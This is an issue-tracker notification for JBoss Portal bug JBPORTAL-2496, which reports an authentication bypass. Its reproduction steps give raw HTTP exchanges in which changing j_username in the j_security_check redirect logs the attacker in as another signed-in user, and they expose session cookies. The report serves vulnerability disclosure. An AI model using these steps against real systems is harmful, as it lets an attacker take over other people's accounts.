Wells guo created JBPORTAL-2496: ----------------------------------- Summary: bypass authentication Key: JBPORTAL-2496 URL: https://issues.jboss.org/browse/JBPORTAL-2496 Project: JBoss Portal Issue Type: Bug Security Level: Public (Everyone can see) Environment: EPP 5.1.0 Reporter: Wells guo Steps to Reproduce: 1. Log into our portal project with correct username and password POST /portal/login HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer:http://XXXX/home?portal:componentId=UIPortal&portal:action=Logout Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 84 initialURI=%2Fportal%2Fprivate%2Fxxxx0%2Fhome&username=userA&password=xxxx 2. Get a 302 response and open the /portal/private/project/home page HTTP/1.1 302 Moved Temporarily Date: Thu, 15 Aug 2013 07:19:48 GMT X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 Location: http://XXXX//home Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/plain; charset=UTF-8 GET /portal/private/xxxx/home HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://XXXX//home?portal:componentId=UIPortal&portal:action=Logout Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff Connection: keep-alive 3. Get a 302 response again, which redirect to secure check page with the username, modify the username to someone else that is logged in. Original message: HTTP/1.1 302 Moved Temporarily Date: Thu, 15 Aug 2013 07:29:42 GMT Pragma: No-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 19:00:00 EST Location:http://XXXX//portal/private/xxxx/j_security_check?j_username=userA&j_password=rememberme1447024746 ^^^^^^^^^^^^^^^^^ Content-Type: text/html;charset=UTF-8 Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Modified message: HTTP/1.1 302 Moved Temporarily Date: Thu, 15 Aug 2013 07:29:42 GMT Pragma: No-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 19:00:00 EST Location: http://XXXX//portal/private/xxxx/j_security_check?j_username=userB&j_... ^^^^^^^^^^^^^^^^ Content-Type: text/html;charset=UTF-8 Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive 4. Send GET request to get the page in "Location" of step3, which is with username "userB" GET /portal/private/xxx/j_security_check?j_username=userB&j_password=rememberme1447024746 HTTP/1.1 ^^^^^^^^^^^^^^^^^^ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://XXXX/portal/private/xxxx/home?portal:componentId=UIPortal&port... Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff Connection: keep-alive 5. Get the response with code 302 and redirect to home page , attchment1. 6. Click content tab in the home page, it will display now login with "userB", and operations can be performed as userB too, Actual results: Successfully bypass authentication. Expected results: Should not log into the project with "userB" successfully. -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators For more information on JIRA, see: http://www.atlassian.com/software/jira